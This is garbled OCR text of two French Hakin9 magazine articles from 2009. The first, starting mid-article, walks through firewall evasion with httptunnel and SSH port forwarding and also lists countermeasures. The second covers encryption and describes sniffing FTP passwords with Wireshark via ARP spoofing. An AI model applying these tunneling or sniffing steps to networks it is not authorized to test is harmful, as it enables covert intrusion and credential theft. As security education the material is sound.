(Cf. Figure 3. Pour voir les paramtres SSH). Si ncessaire, entrez vos informations de connexion. Jusqu' prsent, vous avez ouvert une connexion Tunnele HTTP par laquelle vous vous connectez pour utiliser le shell ct serveur. De cette faon, vous utilisez uniquement ce shell pour excuter des commandes sur le serveur. Pour le transfert des donnes par le tunnel vous prfrerez sans doute SCP. Bon, avanons, nous allons maintenant installer un proxy en local et l'utiliser pour d'autres applications telles que : IRC et Skype. Toute application pouvant utiliser un Proxy SOCK est la bienvenue. Vous pouvez utiliser le serveur de messagerie avec votre mail personnel pour envoyer des messages ou accder au Serveur
Si vous n'avez pas les droits administrateur vous pouvez utiliser les ports au-dessus de 1024, par exemple :
hts forward-port localhost:22 hts help 40000
Si notre serveur httptunnel est lanc et en cours d'excution, vous devriez obtenir la mme chose qu' la Figure 7. Le port 443 doit tre en ECOUTE.
On a presque fini. Terminons en lanant le tunnel. Il faut tre habitu utiliser le client httptunnel. La meilleure faon de procder est encore en ligne de commande :
htc --forward-port 10001 192.168.11.240:443
Nous allons maintenant lier le port local 10001 au serveur httptunnel ayant pour adresse ip : 192.168.11.240 sur le port 443.
28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 31
2009-01-05, 18:16
PRATIQUE
POP/IMAP avec le tunnel. Tout dpend du port utilis avec le client SSH.
root@localhost (connectez-vous au shell grce au tunnel de votre port local et slectionnez 1080 en tant que port dynamique de redirection), configurez galement votre navigateur comme la Figure 10.
Je vous recommande d'utiliser Firefox avec n'importe quelle extension Proxy. De cette faon vous pouvez facilement changer de configuration proxy. Vous pouvez utiliser les Proxies SOCK que vous venez de crer avec toutes les autres applications supportant ces configurations, par exemple: Skype, IRC, P2P, Navigateur. Pour vrifier que tout fonctionne correctement, procdez comme suit : Surfez sur Internet sans proxy et choisissez le mode de connexion direct partir des configurations Proxy de votre navigateur. Allez sur un site web, par exemple : http://whatismyip.com et notez son adresse ip. Ensuite, choisissez un Proxy SOCK, et entrez nouveau l'adresse IP que vous utilisez. Vous devez voir votre propre adresse IP de votre serveur sur Internet. En clair, cela signifie que votre proxy fonctionne correctement. Pour tablir une connexion au proxy vous pouvez utiliser galement : htc (client httptunnel) puis indiquer vos informations d'authentification, ou dfinir votre propre User Agent. Vous pouvez galement vos priphriques internes qui se trouvent chez vous. Il suffit de taper leur adresse IP prive dans la barre d'adresse du navigateur. Ceci a un avantage, vous n'ouvrez qu'un seul port pour les connexions entrantes et aussi pour vous connecter avec le serveur httptunel.
28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 32
2009-01-05, 18:16
2/2009 HAKIN9
33
28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 33
2009-01-05, 18:17
PRATIQUE
Utilisez VNC pour une administration distance d'un poste.
Configurez VNC Server avec votre serveur externe. Les ports par dfaut pour VNC sont : 5900/TCP et 5800/TCP, vous devrez galement spcifier le numro d'affichage. J'utiliserai le numro d'affichage 64. Dans mon cas, les numros de ports sont : 5964/TCP et 5864/TCP :
htc forward-port 10001 192.168.11.240:443, putty -L 5964:127.0.0.1:5964 -X -P 10001 root@localhost
Scurit Tunnel
Il est primordial de veiller l'intgrit, l'anonymat et l'authentification lors de l'utilisation d'un tunnel HTTP & SSH.
HTTP-CONNECT
La mthode HTTP CONNECT peut tre utilise conjointement avec un proxy qui peut tabuler dynamiquement sur le mode tunnel.
(-L rediriger le port local 5964 pour votre client VNC, et autoriser la redirection vers X11 avec -X), Listing 1. Configuration SSH.
/etc/ssh/sshd_config AllowTcpForwarding yes #Redirection TCP autorise ou non GatewayPorts yes #Les htes distants ont l'autorisation ou non de se connecter aux ports redirigs sur poste client. X11Forwarding yes #La connexion au serveur d'affichage X11 est automatiquement redirige sur le poste distant #de sorte que n'importe quel programme lanc depuis un shell (ou commande) passera par un canal #crypt. La vritable connexion au serveur X se fera depuis le poste en local. PermitTunnel yes #Support du Tunneling VPN
Configurez votre client de messagerie pour utiliser localhost:666 comme serveur de messagerie sortant.
Mesures de contre-attaque
Il y a plusieurs mesures pour chapper des contre-attaques. Voici le dcaloque : Refusez le trafic non prioritaire (Listing 2) ; Fermez les ports non ncessaires et n'excuter que les services ncessaires ; Utilisez les inspections d'tat pour viter le Tunneling ACK ; Allouez un dlai de connexion pour prvenir les Canaux Cachs de Timing ; Utilisez le filtrage de contenu ; Utilisez des HIDS et NIDS ; Utilisez des proxies aprs Authentification ; Refusez les requtes de type HTTPCONNECT ; Pensez utiliser des antivirus et antispywares ; Consultez rgulirement les fichiers log ; Surveillez attentivement le trafic suspect ; Administrez votre rseau et tablissez des statistiques sur le trafic.
34
HAKIN9 2/2009
28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 34
2009-01-05, 18:17
GNU est un systme d'exploitation libre comprenant des applications gratuites. Le Projet GNU comprend des outils rputs comme : GCC, binutils, bash, glibc et coreutils. GNU GPL est une licence qui peut tre utilise pour les applications gratuites. L'acronyme signifie : General Public Licence (Licence Publique Gnrale) et historiquement elle a pour vocation de n'imposer aucune restriction sur lusage des programmes. Pour de plus amples informations, veuillez consulter le site : http://www.gnu.org
Sur Internet
Projet GNU : http://www.gnu.org/ Internet Assigned Numbers Authority : http://www.iana.org/ Liste des Numros de Port : http://www.iana.org/assignments/ port-numbers/ Logiciel httptunnel : http://www.nocrew.org/software/ httptunnel.html Fichiers binaires win32 httptunnel : http://www.neophob.com/ serendipity/index.php?/archives/ 85-GNU-HTTPtunnel-v3.3Windows-Binaries.htmlss.full.link RFC 2612, Hypertext Transfer Protocol HTTP/1.1 : http://www.w3.org/Protocols/rfc2616/ rfc2616.html Liste de proxies : http://multiproxy.org/ Stunnel : http://www.stunnel.org/ Ethereal, Wireshark : http://www.ethereal.com/ Snort IDS : http://www.snort.org/ OpenSSH : http://www.openssh.org/ OpenSSH pour Windows : http://sshwindows.sourceforge.net/ OpenVPN : http://openvpn.sourceforge.net/ Iptables et Netfilter : http://www.netfilter.org/ TCP/IP avec l'HTTP : http://www.htthost.com/ Tunneling DNS : http://www.dnstunnel.de/ Tunneling ICMP : http://thomer.com/icmptx/ Tunneling ACK : http://www.ntsecurity.nu/toolbox/ ackcmd/
Sachez que si vous utilisez les techniques de canaux cachs au sein de rseaux d'entreprises vous encourez des sanctions selon le pays concern. Vous devez donc connatre la politique de l'entreprise. Mais galement, connatre les risques lis l'utilisation des canaux cachs. Notez qu'il peut arriver que des entreprises tablissent des contrats mentionnant le transfert de donnes par tunneling en collaboration avec leurs partenaires. Cela permet notamment de protger la transmission d'informations sensibles.
Primtre de Scurit
Le primtre de scurit comprend : des technologies firewall, le filtrage de paquets, dtection de l'tat du rseau, proxies applicatifs, VPN (Virtual Private Network), proxies HTTP, passerelle scurise, IDS (Systme de Dtection d'Intrusion), IPS (Systme de Prvention d'Intrusions) avec bornes d'accs, passes, barrire pour vhicules, contrles de scurit (Cf. Figure 1).
Rsum
Faire du tunneling n'est finalement pas si compliqu. Il n'est pas ncessaire d'avoir beaucoup de connaissances ni de forte exprience. Lapplication httptunnel est recommande pour effectuer des tests d'intrusion. Vous pouvez cacher vos traces afin de vous protger contre n'importe quel primtre de scurit. Attention : Il existe des mthodes de dtection qui peuvent par exemple comparer le trafic http entrant et sortant.
Une rgle de scurit de base : le trafic http entrant est en rgle gnrale plus important que le sortant. Si c'est l'inverse, il se peut que ce soit du trafic cach. Autre lment : le cryptage d'un Tunnel SSL Tunnel permet de protger le trafic cach. Certains pays n'autorisent pas l'utilisation du cryptage. Vous ne serez jamais protg 100%. Il peut toujours y avoir des erreurs de configuration, des signatures inconnues, des canaux cachs voire mme
l'ignorance de l'utilisateur. Pour conclure, n'utilisez pas les techniques mentionnes ci-dessus des fins illgales. Avant toute utilisation vous devez connatre les clauses relatives aux lois du pays concern. Michael Schratt
Michael Schratt travaille dans la Scurit Rseau Oprationnelle, c'est un passionn de programmation et il a une longue exprience dans la scurit des applications Web. Son rle en entreprise est de surveiller l'ensemble des systmes informatiques et la scurit des postes Unix et Windows. Contact : mail@security-schratt.at 2/2009 HAKIN9 35
28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 35
2009-01-05, 18:17
PRATIQUE Le cryptage
Degr de difficult
a confidentialit demeure un lment essentiel et intrinsque la scurit de toute information circulant ou non sur un rseau informatique. Et ce nest pas un hasard si elle figure en bonne place dans le fameux triangle ultra important en matire de scurit informatique savoir la Disponibilit, lIntgrit et la Confidentialit. Lmetteur dune information est naturellement cens connatre dune manire ou dune autre le ou les destinataires potentiels de son message. Et toute personne se retrouve mal laise si elle se sait espionne ou surveille par un individu malintentionn. Le cryptage est laction de rendre illisible des informations pour quiconque ne possde pas la cl de dcryptage. Parmi les mthodes dattaque, linterception de message occupe une place prpondrante.
Lanalyse de trafic est une discipline que beaucoup de spcialistes et hackers affectionnent particulirement. Il sagit de se servir dun logiciel pour couter et stocker les paquets du trafic et ensuite essayer de lire le contenu des communications ainsi stockes sur le disque dur. Beaucoup doutils existent pour faire cela. Et ces outils se basent la plupart du temps sur le fait que certains protocoles font transiter les informations et les commandes sous forme de texte et en clair sur le rseau. Le cas le plus typique est celui de
FTP (File Transfer Protocol). Pour sen convaincre, il suffit de mettre en place un petit rseau comme lindique le schma de la Figure 1. Considrons que lordinateur PC Alma se connecte au serveur FTP. Il suffit de lancer un sniffer comme Wireshark sur PC Pirate. On peut enregistrer la capture des paquets au format pcap afin de pouvoir les rutiliser plus tard. Une fois la capture finie on utilise les filtres adquats pour connatre les mots de passe passs en clair via les connexions FTP (ou telnet,..). Avec les options Follow TCP Stream et Follow SSL Stream il est possible de suivre entirement une connexion TCP ou SSL partir d'un seul paquet. Pour cela, il faut slectionner le paquet qui vous parat suspect, une connection FTP ou l'accs un site scuris, puis faire Analyse-> Follow TCP Stream ou Analyse->Follow SSL Stream. Wireshark va filtrer tous les paquets reus avec les adresses IP sources et destinations ainsi que les numros de ports utiliss dans le paquet slectionn. Ce qui affichera toutes les donnes changes du flux TCP entier avec des couleurs diffrentes afin de reconnatre les paquets envoys des paquets reus. Avec cette technique, lors d'une attaque MITM, le pirate pourra suivre entirement une connexion un site web par exemple, rcuprer les pages affiches, les donnes envoyes, de mme pour les donnes cryptes. La Figure 2 montre une interface de Ethereal qui est pratiquement la mme que celle de
36_37_38_39_40_41_42_43_Cryptage.indd
36
2009-01-05, 18:18
TECHNIQUES DE CRYPTAGE
Wireshark. Vous pouvez y voir quelques paquets FTP capturs. La figure 3 prsente linterface de Wireshark/Ethereal qui permet de slectionner le protocole filtrer ainsi que le port. Et dans le cas de FTP, les mots de passe ainsi que toutes les communications apparaissent clairement et sans aucune ambigut. Sil sagit dun rseau partag donc prsence dun HUB sur le rseau, alors Wireshark suffit pour sniffer et dchiffrer le contenu. Mais sil sagit dun rseau commut avec un switch, il faudra mettre en place un MAC flooding (moins efficace) ou un ARP spoofing (plus efficace) Tableau 1. Le modle OSI et la cryptographie OSI 7 Application 6 Prsentation 5 Session 4 Transport Transport UDP, TCP SSL, PCT, STLP, TLS SSH-Trans IPSec-Transport IPsec IP MPLS couche 3 (BGP) L2TP L2F, PPTP MPLS Couche 2 Cryptage niveau hard TCP/IP Application http, ftp, telnet, Protocoles PGP, GnuPG, SET, S-HTTP, S/MIME Socks, SSH-User
Interconnexion de rseau IP ICMP Interface rseau Ethernet, Frame Relay, ATM, PPP,
Tableau 2. Protocoles issus dune combinaison avec SSL Protocole scuris avec SSL https smtps nntps sshell ldaps ftps-data ftps telnets imaps ircs pop3s dun certificat lectronique, dun serveur de messagerie S/MIME, et dun client de messagerie S/MIME. S/MIME assure : lIntgrit : utilisation dune fonction de calcul du digest et cryptage avec la cl prive. lAuthentification : base sur lutilisation de la cl prive du certificat lectronique la Non rpudiation : ralisation dune signature lectronique Listing 1. Cl publique PGP
-----BEGIN PGP PUBLIC KEY BLOCK----Version: GnuPG v1.0.6 (GNU/Linux) pQGiBDm+tJYRBACyoHzCRdJXXXFai0bENERmPYFQwx9gOWm7kZRnD27tzLjuQVWt oFgooN/li04QIAn0o6fXolGIbPH//x4QstrZDVqxC8iEwEghHkjfJJM8GBECAAwF Ajm+dL0FCQPCZwAACgkQvatgyKeVS0gbuwCePu5P6uEzIeOKtXGVOoCZB1C8yPkA oJFot6R8KbweB58KBR4fCihwKhKa =fytL -----END PGP PUBLIC KEY BLOCK-----
Numro de port 443/tcp 465/tcp 563/tcp 614/tcp 636/tcp 989/tcp 990/tcp 992/tcp 993/tcp 994/tcp 995/tcp la Confidentialit : (cryptage symtrique) lexpditeur envoie au destinataire la cl de chiffrement crypte par la cl publique de ce dernier.
Les banques font partie des premiers utilisateurs de systmes de cryptographie. Les cartes bancaires possdent trois niveaux de scurit : le code confidentiel, la signature RSA et l'authentification DES. Dun autre ct, les navigateurs Web, ou browsers, tels que Mozilla Firefox ou Internet Explorer, utilisent le protocole de scurit SSL (Secure Sockets Layers), qui repose sur un procd de cryptographie par cl publique : le RSA. Il existe une correspondance entre le modle OSI et les standards de cryptage. Ceci est illustr dans le Tableau 1. Dans cette section, nous aborderons les diffrents protocoles de cryptage de communication tels que PEM, MOSS, S/MIME, PGP, SSL/TLS, SSH, S-http, SET, IPSec .
PEM/MOSS
Pem : Privacy Enhanced Mail est un protocole scuris de messagerie numrique qui utilise les certificats numriques grs par une Autorit de certification. MOSS : MIME Object Security Services, est un remplacement de PEM qui nutilise pas les certificats numriques grs par une AC, il fournit une association entre adresses email et les certificats et permet lchange scuris des fichiers attachs.
PGP
PGP est un systme de cryptographie hybride, utilisant une combinaison des fonctionnalits de la cryptographie cl publique et de la cryptographie symtrique.
S/MIME
S/MIME : est une version scurise du MIME. Lutilisation de S/MIME ncessite la prsence
2/2009 HAKIN9
37
36_37_38_39_40_41_42_43_Cryptage.indd
37
2009-01-05, 18:18
PRATIQUE
Lorsqu'un utilisateur chiffre un texte avec PGP, les donnes sont dabord compresses. Cette compression des donnes permet de rduire le temps de transmission par tout moyen de communication, d'conomiser l'espace disque et, surtout, de renforcer la scurit cryptographique. La plupart des cryptanalystes exploitent les modles trouvs dans le texte en clair pour casser le chiffrement. La compression rduit ces modles dans le texte en clair, amliorant par consquent considrablement la rsistance la cryptanalyse. Ensuite, l'opration de chiffrement se fait principalement en deux tapes : PGP cre une cl secrte IDEA de manire alatoire, et chiffre les donnes avec cette cl. Ensuite, PGP crypte la cl secrte IDEA et la transmet au moyen de la cl RSA publique du destinataire. L'opration de dcryptage se fait galement en deux tapes : PGP dchiffre la cl secrte IDEA au moyen de la cl RSA prive. PGP dchiffre les donnes avec la cl secrte IDEA prcdemment obtenue. que le serveur ou le client ne peut lire les informations transitant sur le rseau). Il n'est donc pas possible d'couter le rseau l'aide d'un analyseur de trames. Le client et le serveur s'authentifient mutuellement afin d'assurer que les deux machines qui communiquent sont bien celles que chacune des parties croit tre. Il n'est donc plus possible pour un pirate d'usurper l'identit du client ou du serveur (spoofing). La version 1 du protocole (SSH1) propose ds 1995 avait pour but de servir d'alternative aux sessions interactives (shells) telles que Telnet, rsh, rlogin et rexec. Ce protocole possdait toutefois une faille permettant un pirate d'insrer des donnes dans le flux chiffr. C'est la raison pour laquelle en 1997 la version 2 du protocole (SSH2) a t propose en tant que document de travail (draft) l'IETF. Les documents dfinissant le protocole sont accessibles en ligne sur http://www.ietf.org/ html.charters/secsh-charter.html. Secure Shell Version 2 propose galement une solution de transfert de fichiers scuris (SFTP, Secure File Transfer Protocol).
SSH
Le protocole SSH (Secure Shell) a t mis au point en 1995 par le Finlandais Tatu Ylnen. Il s'agit d'un protocole permettant un client (un utilisateur ou bien mme une machine) d'ouvrir une session interactive sur une machine distante (serveur) afin d'envoyer des commandes ou des fichiers de manire scurise. Les donnes circulant entre le client et le serveur sont chiffres, ce qui garantit leur confidentialit (personne d'autre
38 HAKIN9 2/2009
36_37_38_39_40_41_42_43_Cryptage.indd
38
2009-01-05, 18:18
TECHNIQUES DE CRYPTAGE
S-http
Contrairement SSL qui travaille au niveau de la couche de transport, S-HTTP procure une scurit base sur des messages au-dessus du protocole HTTP, en marquant individuellement les documents HTML l'aide de certificats. Alors que SSL est indpendant de l'application utilise et chiffre l'intgralit de la communication, S-HTTP est trs fortement li au protocole HTTP et chiffre individuellement chaque message. Les messages S-HTTP sont bass sur trois composantes : le message HTTP, les prfrences cryptographiques de l'envoyeur et les prfrences du destinataire. Ainsi, pour dcrypter un message S-HTTP, le destinataire du message analyse les en-ttes du message afin de dterminer le type de mthode qui a t utilis pour crypter le message. Puis, grce ses prfrences cryptographiques actuelles et prcdentes, et aux prfrences cryptographiques prcdentes de l'expditeur, il est capable de dchiffrer le message. modle OSI) utilisant des algorithmes permettant le transport de donnes scurises sur un rseau IP. Son objectif est d'authentifier et de chiffrer les donnes : le flux ne pourra tre comprhensible que par le destinataire final (chiffrement) et la modification des donnes par des intermdiaires ne pourra tre possible (intgrit). IPsec est souvent un composant de VPN, il est l'origine de son aspect scurit (canal scuris ou tunneling). La mise en place d'une architecture scurise base d'IPsec est dtaille dans la RFC
SET
SET (Secure Electronic Transaction) est un protocole de scurisation des transactions lectroniques mis au point par Visa et MasterCard, et s'appuyant sur le standard SSL. SET est bas sur l'utilisation d'une signature lectronique au niveau de l'acheteur et une transaction mettant en jeu non seulement l'acheteur et le vendeur, mais aussi leurs banques respectives. Lors d'une transaction scurise avec SET, les donnes sont envoyes par le client au serveur du vendeur, mais ce dernier ne rcupre que la commande. En effet, le numro de carte bleue est envoy directement la banque du commerant, qui va tre en mesure de lire les coordonnes bancaires de l'acheteur, et donc de contacter sa banque afin de les vrifier en temps rel. Ce type de mthode ncessite une signature lectronique au niveau de l'utilisateur de la carte afin de certifier qu'il s'agit bien du possesseur de cette carte.
IPSec
IPSec (Internet Protocol Security) est un ensemble de protocoles (couche 3
36_37_38_39_40_41_42_43_Cryptage.indd
39
2009-01-05, 18:18
PRATIQUE
2401. Il dispose de deux modes : le mode transport et le mode tunnel.
Scurisation des communications lintrieur dun rseau Windows 2008 avec IPsec
Cet exemple montre que IPsec permet de chiffrer les communications du rseau (confidentialit) et/ou de garantir que lordinateur ou le serveur avec lequel vous tes en train de dialoguer est bien celui quil prtend tre (authenticit), et ce de manire transparente pour lutilisateur. Il faut dans un premier temps, crer un objet GPO parce quil est plus pratique et logique dappliquer les paramtres IPsec lensemble du rseau, ou au moins un site/domaine/OU, plutt que de le faire poste poste (on utilise donc les GPO). Ensuite, il faut paramtrer cet objet. Une fois ceci fait, il faut mettre jour les GPO au niveau des autres ordinateurs du rseau, afin quils puissent communiquer de faon crypte avec le premier ordinateur configur.
se trouve dans une situation correspondant, il applique alors la rgle de scurit. Loption Exemption dauthentification permet de ne pas soumettre certains ordinateurs la rgle de scurit, typiquement des ordinateurs qui doivent communiquer avant quils ne puissent stre authentifis ou des ordinateurs qui ne peuvent pas utiliser le type dauthentification configur dans la rgle de scurit. Loption Serveur Serveur permet dauthentifier les communications entre des adresses IP ou des ensembles
dadresses spcifiques. Loption Tunnel sert la configuration de tunnels IPsec pour les passerelles VPN. Loption Personnalise enfin permet, comme son nom lindique, de configurer une rgle de scurit qui ncessite des paramtres spcifiques. Laissez le choix par dfaut (Isolation) puis cliquez sur Suivant
Configuration requise
Demander lauthentification des connexions entrantes et sortantes permet dtablir
Paramtrage de la GPO
Toujours dans le mme environnement, fates un clic-droit sur lobjet de stratgie de groupe ainsi cr, puis slectionnez Modifier. Dployez ensuite larborescence Configuration de lordinateur > Stratgies > Paramtres Windows > Paramtres de scurit > Pare-feu Windows avec fonctions avances de scurit. Fates un clic-droit sur Rgles de scurit de connexion et slectionnez Nouvelle rgle.
Type de rgle
Il reste maintenant dfinir le type de rgle appliquer. Il y a plusieurs options. Loption Isolation permet de traiter tout le trafic pour un profil rseau donn. Lorsque lordinateur
40 HAKIN9 2/2009
36_37_38_39_40_41_42_43_Cryptage.indd
40
2009-01-05, 18:18
TECHNIQUES DE CRYPTAGE
une communication scurise si les deux ordinateurs le permettent ; sinon elle stablit normalement de faon non scurise. Il faut laisser le choix par dfaut qui est Demander lauthentification des connexions entrantes et sortantes puis cliquer sur Suivant. Pare-feu Windows avec fonctionnalits avances et slectionnez Proprits. Dans longlet Paramtres IPsec, dans le champ Exemptions IPsec indiquez Oui dans le menu droulant (cela permet dautoriser les requtes de type ICMP telles que ping circuler mme si la communication scurise IPsec ne peut tre tablie, ce qui peut savrer trs utile pour diagnostiquer des problmes rseau), puis cliquez sur le bouton Personnaliser dans le champ Valeurs par dfaut IPsec. Dans lencadr Protection des donnes (mode rapide), slectionnez Avanc puis cliquez sur Personnaliser. Dans la fentre Personnaliser les paramtres de protection des donnes, cochez Demander le chiffrement de toutes les rgles de scurit de connexion qui utilisent ces paramtres puis cliquez sur OK : ainsi les communications seront chiffres en plus dtre authentifies. Dans la fentre Personnaliser les paramtres IPsec, cliquez nouveau sur OK, ainsi que dans la fentre de Proprits Parefeu Windows avec fonctions avances. Fermer la console Gestion de stratgie de groupe. Nous allons prsent vrifier
Mthode dauthentification
Loption Par dfaut utilise la mthode dauthentification spcifie dans les proprits du profil (Onglet IPsec des proprits de Pare-feu Windows avec fonctions avances de scurit). Loption Ordinateur et Utilisateur vrifie qu la fois lordinateur et lutilisateur qui tentent de communiquer avec le rseau sont authentifis sur le domaine ou sur un domaine li par une relation dapprobation. Loption Ordinateur vrifie que lordinateur qui tente de communiquer avec le rseau est authentifi sur le domaine ou sur un domaine li par une relation dapprobation. Loption Certificat dordinateur permet un ordinateur non authentifi sur le domaine de communiquer avec le rseau sil est muni dun certificat mis par lautorit de certification spcifie. Laissez le choix par dfaut (Par dfaut) puis cliquez sur Suivant .
Figure 7. Proprits de Pare-feu Windows avec fonctions avances de scurit le bon fonctionnement du systme prcdemment mis en place.
Profil
La page profil permet de slectionner quels profils sappliquera la rgle. Loption Domaine sapplique lorsquun ordinateur concern par la rgle est connect un rseau local sur lequel rside son compte de domaine (i.e. lorsque lordinateur est connect au sein de lentreprise). Loption Prives sapplique lorsquun ordinateur est connect un rseau partir duquel le compte de domaine nest pas joignable (i.e. au domicile de lutilisateur). Loption Publiques sapplique lorsquun ordinateur est connect au domaine depuis une connexion publique (aroport, cybercaf) Laissez les 3 cases coches par dfaut, puis cliquez sur Suivant. Ensuite, indiquez le Nom Demander lauthentification des connexions et cliquez sur Terminer.
36_37_38_39_40_41_42_43_Cryptage.indd
41
2009-01-05, 18:18
PRATIQUE
rsistance la cryptanalyse. Toutefois, la compression est impossible sur les fichiers de taille insuffisante ou supportant mal ce processus. PGP cre ensuite une cl de session qui est une cl secrte usage unique. Cette cl correspond un nombre alatoire, gnr par les dplacements alatoires de votre souris et les squences de frappes de touches. Pour crypter le texte en clair, cette cl de session utilise un algorithme de cryptage conventionnel rapide et scuris. Une fois les donnes codes, la cl de session est crypte vers la cl publique du destinataire. Cette cl de session crypte par cl publique est transmise avec le texte chiffr au destinataire. Le processus de dcryptage est inverse. La copie de PGP du destinataire utilise sa cl prive pour rcuprer la cl de session temporaire qui permettra ensuite de dcrypter le texte crypt de manire conventionnelle. Il est important de tlcharger et installer OpenPGP. Pour installer OpenPGP sous Windows, vous pouvez le tlcharger de site : GPG : GNU Privacy Guard ftp:// lcsweb.net/pub/winpt/winpt-0.5.13installer.exe (WinPT + GPG). Cette version accepte des plug-ins automatiques pour les e-mails. Elle est compatible avec PGP 6, 7, 8 et est gratuite, et librement adaptable/modifiable par les entreprises ou les particuliers (licence GNU GPL) PGP : Pretty Good Privacy PGPfreeware 8.0 http://www.pgp.com/ Cette version est payante pour les entreprises et les professions librales. Elle ne supporte pas de plug-in automatique pour les e-mails mme si elle est conviviale.
Voici les adresses depuis lesquelles nous pouvons tlcharger OpenPGP pour MacOS X : MacGPG (Mac GNU Privacy Guard) http://macgpg.sourceforge.net/fr/ index.html (divers logiciels installer). Elle accepte aussi des plug-ins automatiques pour les e-mails elle est compatible avec PGP 6, 7, 8 gratuite et librement adaptable/ modifiable par les entreprises et les particuliers (licence GNU GPL) PGP : Pretty Good Privacy PGPfreeware 8.0 http://www.pgp.com/ : Il sagit de la version payante pour MAC Aucun plug-in automatique nest utilis pour les e-mails
OpenPGP est disponible pour Linux. GnuPG. Il est prinstall par dfaut dans toutes les distributions Linux. Le tlchargement peut aussi se faire partir des sites web des distributions.
PGP est une combinaison des meilleures fonctionnalits de la cryptographie de cl publique et de la cryptographie conventionnelle. PGP est un systme de cryptographie hybride. Lorsqu'un utilisateur crypte du texte en clair avec PGP, ces donnes sont d'abord compresses. Cette compression des donnes permet de rduire le temps de transmission par modem, d'conomiser l'espace disque et, surtout, de renforcer la scurit cryptographique. La plupart des cryptanalystes exploitent les modles trouvs dans le texte en clair pour casser le chiffrement. La compression rduit ces modles dans le texte en clair, amliorant par consquent considrablement la
42 HAKIN9 2/2009
36_37_38_39_40_41_42_43_Cryptage.indd
42
2009-01-05, 18:19
TECHNIQUES DE CRYPTAGE
Mise en place des cls PGP
Lutilisation de OpenPGP ncessite que lon cre sa propre paire de cls et que lon se procure la cl publique de ses correspondants. On suit donc quatre tapes savoir : la gnration de sa paire de cls, lexportation de la cl publique et lenvoi dune copie de cette cl publique aux correspondants potentiels et finalement limportation de la cl publique des correspondants. Concernant la gnration de la paire de cls, il faut remarquer que GPG ou PGP proposent de gnrer votre paire de cls lors du premier lancement. Et cette paire de cls est normalement unique, et on peut la conserver durant des annes. Cette paire de cls contient une cl publique et une cl prive : la cl publique gnre constitue le cadenas qui permettra vos correspondants de crypter les e-mails qu'ils vous envoient. GPG et PGP permettent l'exportation de votre cl publique par leur fonction export . Vos correspondants doivent avoir une copie de votre cl publique PGP, qui ressemblera un peu au Listing 1.
Sur Internet
http://www.cryptage.org/applications-cryptographie.html Site web ddi la cryptographie, http://laurent.flaum.free.fr/pgpintrofr.htm Principe de cryptage PGP, http://dictionnaire.phpmyvisites.net/definition-CRYPTAGE-4338.htm Dfinition du cryptage, ftp://ftp.pgpi.org/pub/pgp/6.5/docs/french/IntroToCrypto.pdf Introduction la cryptographie, http://www.winpt.org/fr/faq.html : Mode d'emploi de GPG Windows (Windows Privacy Tray), http://www.gnupg.org/gph/fr/manual.html Mode d'emploi de GPG ligne de commande, http://macgpg.sourceforge.net/fr/index.html#docs Mode d'emploi de MacGPG, http://www.pgpsupport.com/ PGP 8.0 pour Windows XP, http://www.gnupg.org/ Page web de GPG, http://fr.wikipedia.org/wiki/Cryptologie, http://www.bibmath.net/crypto/index.php3.
de chiffrement peuvent cependant tre ralises dans PGPfreeware 8.0 par le presse-papiers ou la barre d'outils flottante (voir la FAQ ci-dessous). Pour GPG, soit le plug-in est inclus (Outlook Express, Eudora), soit il faut tlcharger le plug-in et l'installer, suivant le logiciel de courrier utilis. Sous Windows : Outlook Express : inclus dans WinPTGPG 1.0 (libre), Eudora : inclus dans WinPT-GPG 1.0 (libre), Thunderbird Mail : Enigmail (libre) http:// enigmail.mozdev.org/thunderbird.html, Mozilla : Enigmail (libre) http:// enigmail.mozdev.org/, Outlook : G-Data (libre) http:// www.gdata.de/gpg/download.html, Pegasus Mail : QDGPG (libre) http:// community.wow.net/grt/qdgpg.html, The Bat! : Ritlabs (shareware) http:// www.ritlabs.com/the_bat/pgp.html, Becky! 2 : BkGnuPG (freeware) http:// hp.vector.co.jp/authors/VA023900/gpgpin/index_en.html.
Eudora : Eudora-GPG (libre) http:// mywebpages.comcast.net/chang/ EudoraGPG/, Entourage : EntourageGPG (libre) http:// entouragegpg.sourceforge.net/fr_ readme.html, Thunderbird Mail : Enigmail (libre) http:// enigmail.mozdev.org/thunderbird.html, Mozilla : Enigmail (libre) http:// enigmail.mozdev.org/.
Conclusion
GPG et PGP permettent l'importation de la cl de vos correspondants dans votre trousseau de cls publiques par la fonction import . Ensuite, lorsque vous enverrez un e-mail un de ces correspondants, le plug-in courrier se chargera de trouver le cadenas de ce correspondant (sa cl publique) dans votre trousseau de cls publiques PGP, puis il cryptera automatiquement le message avant envoi.
Sous Linux : KMail (KDE) : inclus dans KMail, Thunderbird Mail : Enigmail (libre) http:// enigmail.mozdev.org/thunderbird.html, Mozilla : Enigmail (libre) http:// enigmail.mozdev.org/, Evolution (Gnome) : inclus dans Evolution.
Dans cet article, nous avons prsent quelques possibilits dinterception et de lecture des paquets. Il existe encore beaucoup dautres techniques qui permettent de lire les paquets envoys sur le rseau. Pour viter que le trafic rseau ne soit cout, il convient de le crypter tout simplement. Il existe plusieurs faons de mettre en place un systme de cryptage. On peut crypter soit le message avant de lenvoyer, soit le canal de transmission, soit les deux simultanment. Il est cependant important de sinformer quotidiennement de la solidit du systme de cryptage que vous utilisez car ces algorithmes peuvent tre casss du jour au lendemain et les spcialistes et chercheurs y travaillent jour et nuit. En somme, crypter est bien mais sassurer de bien crypter avec les outils les plus srs du moment, cest encore mieux. La veille technologique simpose donc.
Ignace K. Kueviako
Ignace Kangni Kueviako est un ingnieur en informatique et rseau. Il enseigne les cours de programmation et de rseau informatique au Groupe ESIBA (TOGO) o il travaille aussi en tant qu'administrateur de rseau. Il s'intresse beacoup la scurite informatique. Pour contacter l'auteur : kignace14@yahoo.fr 2/2009 HAKIN9 43
36_37_38_39_40_41_42_43_Cryptage.indd
43
2009-01-09, 11:37
TECHNIQUE
LEVIER LAURENT
Degr de difficult
